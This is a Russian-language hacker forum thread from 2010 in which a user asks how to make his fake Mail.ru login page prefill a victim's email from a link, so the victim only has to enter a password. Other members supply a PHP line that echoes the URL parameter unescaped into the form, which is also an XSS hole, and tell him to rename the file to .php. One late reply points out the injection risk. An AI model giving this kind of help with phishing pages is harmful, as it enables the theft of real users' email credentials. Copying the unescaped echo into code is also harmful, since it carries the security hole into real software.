Вопрос про фейк Mail.ru

Discussion in 'Песочница' started by anaxanim, 27 Jul 2010.

  1. anaxanim

    anaxanim Banned

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    У меня такой вопрос про фейк
    Если открыть ссылку http://win.mail.ru/cgi-bin/login?email=test@mail.ru то увидите что логин будет test и нам остается толка вводить пароль и мы попадем в свой почтовый ящик.

    [​IMG]

    Если в ссылке test@mail.ru поменять на допустим 123@mail.ru и открыть то логин будет 123 .
    Как я могу такую фишку сделать в своем сайте фейка mail.ru.
    Ну чтоб пихнуть ссылку ламеру и он когда открывал ее там стоял уже его логин и ему остается ввести свой пароль.
    Кто нибудь знает как эта делается в mail.ru ?
    Я где то читал что эт так делается http://сайт_фейк/?login=test&domain=mail.ru но у меня все равно не получается . То есть логин так и остается пустым

    конечно это можно делать в ручном режиме .
    Тоесть открываешь index.html в блокноте и там name="Login" value="test"
    Но каждый раз для каждого ламера этого делать не по хакерски как то
    Вот мне и интересно как это провернуть в автоматическом режиме
     
  2. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    443
    Reputations:
    255
    Открываешь в блокноте свой фейк и учишь его воспринимать запросы.
    Вот код:

    PHP:
    <input type=text name=login SIZE="16" value="<?php echo $_GET['login'];?>" MAXLENGTH="16" >
     
    2 people like this.
  3. anaxanim

    anaxanim Banned

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    не получилось может по подробнее куда что писать .
    я в фейку поменял но там щас в логине стоит <?php echo $_GET['login'];?> когда вызываю в браузере и логин не меняется .
     
  4. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    443
    Reputations:
    255
    Ну это не по хакерски чтобы за тебя всё писали :)
    Сходика ты лучше почитай пару статей для начала)
    Статья 1
    Статья 2
     
    #4 emillord, 27 Jul 2010
    Last edited: 27 Jul 2010
    2 people like this.
  5. anaxanim

    anaxanim Banned

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    спасибо прочитал (вторая ссылка не рабочая )
    но там нету информации которая меня интересует
    там написано как передать данные на php скрипт
    меня интересует как создавать ссылки чтоб когда открывал фейк менялась логин и домен (mail.ru list.ru bk.ru inbox.ru)
     
  6. Zombi ****

    Zombi **** Elder - Старейшина

    Joined:
    4 Apr 2009
    Messages:
    166
    Likes Received:
    183
    Reputations:
    17
    может расширение файла не .php ?
     
    1 person likes this.
  7. anaxanim

    anaxanim Banned

    Joined:
    27 Jul 2010
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    emillord Zombi **** спасибо вам большое брат все получилось
    мне надо было просто фейк переименовать из html на php
     
  8. ZnikiR

    ZnikiR Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    21
    Reputations:
    -5
    А зачем выводить непроверенные данные?
    Мне кажется это не безопасно,а то потом он начнет писать нормальный проект и будет эту же конструкцию использовать.